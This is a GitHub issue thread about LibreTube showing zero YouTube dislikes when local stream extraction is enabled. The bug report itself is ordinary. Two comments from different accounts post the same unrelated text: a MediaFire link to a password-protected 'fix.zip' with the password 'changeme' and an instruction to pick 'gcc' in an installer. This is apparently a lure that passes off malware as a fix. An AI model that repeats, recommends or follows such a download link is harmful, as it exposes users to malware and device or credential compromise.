### ISSUE TITLE
Return YouTube dislike support for local streams extraction

### ISSUE THREAD

**Issue by KoolTechTricks** [libre-tube/LibreTube#6412]
### Steps to reproduce

1. Load a video with enabled "Local stream extraction" option and see dislikes count.
2. Load the same video with disabled "Local stream extraction" option and see dislikes count.

### Expected behavior

Dislikes count is shown correctly OR dislikes entry is hidden when Local stream extraction is enabled

### Actual behavior

Zero dislikes

### LibreTube version

0.25.1

### Android version

Any

### Other details

I assume this happens because dislikes count is proxied through Piped, and local extraction from `returnyoutubedislikeapi.com` isn't implemented yet.

As adding local extraction from `returnyoutubedislikeapi.com` may be controversial (closed server and database), it may be wise to disable this option by default. When disabled, dislikes counter should be hidden.

### Acknowledgements

- [X] I have searched the existing issues and this is a new ticket, **NOT** a duplicate or related to another open issue.
- [X] I have written a short but informative title.
- [X] I will fill out all of the requested information in this form.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
